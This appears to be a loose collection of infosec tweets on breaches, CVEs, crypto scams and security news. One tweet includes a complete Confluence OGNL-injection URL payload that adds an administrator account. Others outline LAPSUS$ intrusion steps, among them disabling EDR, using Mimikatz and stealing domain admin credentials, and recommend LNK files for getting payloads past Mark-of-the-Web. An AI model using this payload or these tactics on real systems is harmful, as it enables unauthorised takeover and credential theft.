So to sum up LAPSUS$ TTPs: - Bing search for exploits on GitHub - Disable EDR - Download Mimikatz - Obtain DA creds from files (DomAdmins-LastPass.xlsx) - - Persistence and exfiltration via forwarding rules - Game over :D

RIP Fluffi Bunni / Danny Boy / Lynn Htun. #1 Team Teso 0day user. facebook.com/ritzmyanmar/ x.com/thedawgyg/stat…

Happy Cray day! 50 years ago today, Cray Research was founded.

Sophisticated FUCKAV bypass technique

Today WIRED is releasing an early, 15,000-word excerpt from Andy Greenberg's new book 'Tracers In The Dark' that tells the story of the crypto-tracing case that led to the takedown of the largest known child sex abuse site ever: wired.trib.al/Gm9KbKk 🎨: Mike Mcquade

Sometimes everything you need on Monday evening is a cup of tea and rekt.news

1/ In a span of just two months from October 2021 - November 2021 we saw Homer.eth (formerly @homer_eth) create and rug pull 5 different projects and profit over $2.8m. Let’s breakdown where the funds when and identify the alleged perpetrator behind it.

Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code. virustotal.com/gui/file/4a240…

PoC - localhost/${%23this.getUserAccessor().addUser('httpvoid','pwn@1234','[email protected]','HttpVoid',%40com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString("confluence-administrators,confluence-users"))}/ to add a new admin user.

This was supposed to be a private video. I’m so embarrassed

☢️ Can confirm: Macros killed in Office 365, 2207 (Build 15427.20210) 1. if doc has MOTW, macros are disabled. 2. if doc is opened from MOTW flagged ISO/IMG, macros are disabled ISOs are no longer effective containers for MOTW evasion. However, bundling payloads into LNK is 🔥

Q: How do these teenagers keep breaching these big orgs? Didn't it come up on a pentest? A: Scope

I don't understand why people say ASN.1 is complex. Looks at RFC2631...

Gone phishing for $5m zachxbt.mirror.xyz/30AYxD0ecbQlEU…

The OpenSSL team must be fans of Hitchock with all these tension building openssl.org/news/secadv/20… #yeahitsofficial #nocriticaljusthigh

Also, a PoC for 1) can be found in github.com/colmmacc/CVE-2… thx to Colm MacCárthaigh

Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious! securityintelligence.com/posts/critical…

Poof... and its gone! CVSS 10.0 RCE in linux kernel (CVE-2022-47939), no more dangling pointer xD

My new blog post! Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP”. Reverse engineering CVE-2022-34718 + write a remote Denial of Service exploit. Covers IPsec and IPv6 fragmentation in the Windows kernel, bin-diffing, and making weird packets securityintelligence.com/posts/dissecti…